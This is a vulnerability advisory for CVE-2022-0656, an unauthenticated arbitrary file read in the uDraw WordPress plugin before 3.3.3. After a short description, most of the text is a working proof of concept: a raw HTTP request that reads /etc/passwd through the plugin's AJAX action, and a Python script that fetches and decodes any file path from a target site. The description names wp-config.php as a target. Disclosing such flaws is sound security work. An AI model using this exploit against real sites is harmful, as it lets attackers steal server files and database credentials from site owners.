uDraw < 3.3.3 – Unauthenticated Arbitrary File Access | CVE 2022-0656

Description

The plugin does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc)

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Connection: close

action=udraw_convert_url_to_base64&url=/etc/passwd

#!/usr/bin/env python3
#
# Usage:
# python3 poc.py <wordpress root url> <absolute filepath to include>
# 
# Example:
# python3 poc.py http://127.0.0.1:8080/ /etc/passwd
#

import sys
import base64

import requests

target_url = sys.argv[1]
filepath = sys.argv[2]

with requests.Session() as session:
    response = session.get(target_url)
    response = session.post(f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php", data={
        "action": "udraw_convert_url_to_base64",
        "url": filepath,
    })
    b64_file = response.text.split(",")[1].strip('"')
    print(base64.b64decode(b64_file).decode())